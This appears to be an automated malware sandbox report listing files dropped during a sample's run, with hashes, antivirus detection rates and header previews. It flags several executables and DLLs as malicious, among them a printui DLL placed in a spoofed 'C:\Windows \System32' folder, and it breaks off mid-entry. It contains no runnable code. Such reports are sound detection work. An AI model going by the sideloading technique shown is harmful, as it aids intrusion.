                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ftubh3y.1oa.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1nvsbblj.n1o.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1wnln3hy.eqb.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a2mjpqoz.c1a.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ayq4jh11.jtv.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evkggpbn.155.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkcxcff4.x04.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdsn3mpz.oeh.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkbjibna.xrm.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_khqfxq1l.pke.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0u35cbz.3xe.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nv54ky2r.rkc.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oxngg5h4.wlp.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_roxaabse.lav.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_shn0ip3e.bek.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uaiaa4ff.qv0.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2ecl2tc.xwv.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvjbsfty.whh.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y14vctc1.ew1.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\Desktop\pyld64.exe

                        Download File
                        Process:C:\Users\user\Desktop\Ld0f3NDosJ.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):15180800
                        Entropy (8bit):6.5564607842905644
                        Encrypted:false
                        SSDEEP:393216:4PsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCvfxlXnwXAaGueVW3XSdEVB3:4ITkS6
                        MD5:43BCE45D873189F9AE2767D89A1C46E0
                        SHA1:34BC871A24E54A83740E0DF51320B9836D8B820B
                        SHA-256:9AE4784F0B139619CA8FDADFA31B53B1CBF7CD2B45F74B7E4004E5A97E842291
                        SHA-512:F3424B65C72E242E77E5129903B4DC42FB94076402D24C9F2CEA07FF117761942ECEDEC43E0AD6E39EF61628ED0C4709BE7706E3C20537D476EDB57DF2521380
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 18%
                        • Antivirus: Virustotal, Detection: 65%, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........l..?..?..?.,.>`..?.,.>..?.,.>..?.).>..?.).>..?.).>...?.,.>..?..?V..?.(.>..?.(z?..?.(.>..?Rich..?........PE..d...hC.f.........."....).............5.........@..........................................`.................................................dC..<................7......................8...............................@...............`............................text............................... ..`.rdata...n.......p..................@..@.data... /...P.......D..............@....pdata...7.......8...\..............@..@.fptable............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................

                        C:\Windows \System32\printui.dll

                        Download File
                        Process:C:\Windows\System32\usvcinsta64.exe
                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):14262784
                        Entropy (8bit):6.551982111344916
                        Encrypted:false
                        SSDEEP:393216:BPsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCvfxlXnwXAaGueVW3XSdEVB3:BITkS6
                        MD5:6CD5395F5675ABBF7644268F0023B0BD
                        SHA1:F64379354EF7D7261D7C8250F98C515DDBDF577D
                        SHA-256:397A1DD2D8DCDE26F5D22AE33AFBF6C6201920F8D27EE213B65896FE99944239
                        SHA-512:5CBD0A6346638FEC900723CD0FECFBE6A7E8449175F297462EFFC92B4436737F4CC9C433F94A0F61F89DEC1F77EF56132CB750AFAE4E7AA57CA318DA3DDA9BDA
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 62%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B...#.X.#.X.#.X...Y`#.X...Y.#.X...Y.#.X..Y.#.X..Y.#.X..Y.#.X...Y.#.X.#.XZ#.X...Y.#.X..vX.#.X...Y.#.XRich.#.X................PE..d....B.f.........." ...). ..........(}....................................................`..................................................O..<................,......................8...........................P...@............0..H............................text............ .................. ..`.rdata...*...0...,...$..............@..@.data....*...`.......P..............@....pdata...,...........f..............@..@.fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................

                        C:\Windows \System32\printui.exe

                        Download File
                        Process:C:\Windows\System32\usvcinsta64.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):64000
                        Entropy (8bit):6.336447440888565
                        Encrypted:false
                        SSDEEP:768:a4uHmXrH60qKdC5vI1iQfCIWVM9G4qW4ne+S/ly+PKAoXRZX6fbX57UWkCRPPA7f:Uca1KAVIPd4n+lbeRZIbSQPPA7f
                        MD5:2FC3530F3E05667F8240FC77F7486E7E
                        SHA1:C52CC219886F29E5076CED98D6483E28FC5CC3E0
                        SHA-256:AC75AF591C08442EA453EB92F6344E930585D912894E9323DB922BCD9EDF4CD1
                        SHA-512:EF78DE6A114885B55806323F09D8BC24609966D29A31C2A5AE6AD93D1F0D584D29418BA76CA2F235ED30AD8AE2C91F552C15487C559E0411E978D397C82F7046
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y..........................................................................Rich....................PE..d...0.sA.........."............................@.............................@.......E....`.......... .......................................'.......P.......@...............0..$...P$..T............................ ..............(!...............................text............................... ..`.rdata....... ......................@..@.data...x....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..$....0......................@..B........................................................................................................................................................................................................................................................................

                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):0.34726597513537405
                        Encrypted:false
                        SSDEEP:3:Nlll:Nll
                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                        Malicious:false
                        Preview:@...e...........................................................

                        C:\Windows\System32\console_zero.exe

                        Download File
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):477696
                        Entropy (8bit):6.57837388441486
                        Encrypted:false
                        SSDEEP:6144:gxB2z8RCqsezXL7YiebX6u+bjq7TC78Vd29ZXph0lhSMXlBXBWnZLcN5hwcf:UIqt7M2bjqnC7m2Xph0lhSMXliZLcF
                        MD5:74CF33F8C2FCB56F749AAF411B9AE302
                        SHA1:934FC91EE0AB5D8879E26BD9A5F002EDCB474602
                        SHA-256:941CB9145ACA265C4E209EF54C14E746696F198C48CE216A0F3FCDAB23DB877E
                        SHA-512:37E36C2A9AAF2B1B6E993BCCDA77B34EFB9AAC8C2260B310BB071592A475298F7FAA2F4DAC38D3402517483F811F57F57B4B9335C41D4140968608248003C012
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 18%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<...x..x..x...E......E..j...E..~..h@..r..h@..i..h@.. ..m@..z...E..}..x.....0A..z..0AP.y..0A..y..Richx..........................PE..d...^B.f.........."....).......................@..........................................`.....................................................P............@...6...................z..8............................x..@...............p............................text...0........................... ..`.rdata..f5.......6..................@..@.data...40..........................@....pdata...6...@...8..................@..@.fptable.............:..............@....rsrc................<..............@..@.reloc...............>..............@..B........................................................................................................................................................................................

                        C:\Windows\System32\libcrypto-3-x64.dll

                        Download File
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):4684800
                        Entropy (8bit):6.761708409908653
                        Encrypted:false
                        SSDEEP:98304:E1+WtBcda7nzo7Vd8qQQPQ1CPwDvt3uFGCC:gXtBcda7nzo7Vd8qQQY1CPwDvt3uFGCC
                        MD5:158F0E7C4529E3867E07545C6D1174A9
                        SHA1:9FF0CCCB271F0215AD24427B7254832549565154
                        SHA-256:DCC1FA1A341597DDB1476E3B5B3952456F07870A26FC30B0C6E6312764BAA1FC
                        SHA-512:51E79D8D0AB183046F87AA659973B45147BB1E1AE8883F688C615CCB18BF9FCCB8779DD872B01748BACD56E141BC096C2BB4CCF32EBD7A49ADC76363355E40FE
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............vI..vI..vI..I..vI;DwH..vI;DsH..vI;DrH..vI;DuH..vI..wI*.vI..wH..vI..vI..vI.GrHl.vI.GvH..vI.G.I..vI.GtH..vIRich..vI........PE..d...d.Lf.........." ...'..4..........4.......................................G...........`...........................................A. ... @D.@....0G.......D.LH...........@G.L.....?.T.............................?.@.............4..............................text...8.4.......4................. ..`.rdata..*.....4.......4.............@..@.data....t...`D..J...JD.............@....pdata..LH....D..J....D.............@..@.rsrc........0G.......F.............@..@.reloc..L....@G.......F.............@..B................................................................................................................................................................................................................................................

                        C:\Windows\System32\libcurl.dll

                        Download File
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):561152
                        Entropy (8bit):6.383490918799092
                        Encrypted:false
                        SSDEEP:12288:0u3rEnX6Gtd3+XZRnRNvNu86p07GZiDnwXA3qGueVW08G:d7EnX/L3+p7NvNu8OqnwXA3qGueVWG
                        MD5:93F8F5133ED40262B9FD437915718B82
                        SHA1:A18E34F2E1ECADA88249D5B6A87F137A2A1E5041
                        SHA-256:78993F8E7AC2D139A8B7198F229D8EF1BA2000D7EB1B07FB7AA4FCCCF7786151
                        SHA-512:E1F15B6CEE766D02823938B38BB580C7EFF94E0F4CD907AC4676A65BBC4A9632B5DB0CA54D7B8E6E14042510720E063C00C538DEA3DCBD56C94C65EEADCFCB26
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1i[.u.5Pu.5Pu.5P|p.Pg.5P..4Qw.5P...P}.5P..6Qq.5P..1Q}.5P..0Qx.5Pe.4Qw.5Pu.4P..5P>p4Q~.5Pe.1Q..5Pe.5Qt.5Pe..Pt.5Pu..Pt.5Pe.7Qt.5PRichu.5P........PE..d....,Of.........." ...(.Z...<.......]....................................................`.........................................@.......H...T............`..(S..............X.......T..............................@............p...............................text...8X.......Z.................. ..`.rdata......p.......^..............@..@.data...(0... ...(..................@....pdata..(S...`...T...*..............@..@.rsrc................~..............@..@.reloc..X...........................@..B................................................................................................................................................................................................................................

                        C:\Windows\System32\libiconv-2.dll

                        Download File
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):1851113
                        Entropy (8bit):6.295735352298234
                        Encrypted:false
                        SSDEEP:24576:SAlxpPnBAUZLY9OVbbTiZGavkg3NyeuQ6l9fH+f2ykqZrkgecviRd7mQFz:DPnBAUZLY9OEZGaXBuQQ9e2YYUQFz
                        MD5:158BC77453D382CF6679CE35DF740CC5
                        SHA1:9A3C123CE4B6F6592ED50D6614387D059BFB842F
                        SHA-256:CF131738F4B5FE3F42E9108E24595FC3E6573347D78E4E69EC42106C1EEBE42C
                        SHA-512:6EB1455537CB4E62E9432032372FAE9CE824A48346E00BAF38EF2F840E0ED3F55ACAEE2656DA656DB00AE0BDEF808F8DA291DD10D7453815152EDA0CCFC73147
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...8.Jd....q.....& ..."............P..........f............................................. .................................................D....@..........d............P..................................(.......................p............................text..............................`.P`.data...............................@.P..rdata..............................@.`@.pdata..d...........................@.0@.xdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..D...........................@.0..CRT....X.... ......................@.@..tls.........0......................@.@..rsrc........@......................@.0..reloc.......P......................@.0B/4...... ....`......................@..B/19.....m....p... ..................@..B/31......2.......4..................@..B/45.....

                        C:\Windows\System32\libintl-9.dll

                        Download File
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):475769
                        Entropy (8bit):5.442192544327632
                        Encrypted:false
                        SSDEEP:12288:YoSRYqB/kDraXbQTNRC6RsclS8DzT6Bam:+YY/kDraLQTNRCPWDzT6Bam
                        MD5:E79E7C9D547DDBEE5C8C1796BD092326
                        SHA1:8E50B296F4630F6173FC77D07EEA36433E62178A
                        SHA-256:1125AC8DC0C4F5C3ED4712E0D8AD29474099FCB55BB0E563A352CE9D03EF1D78
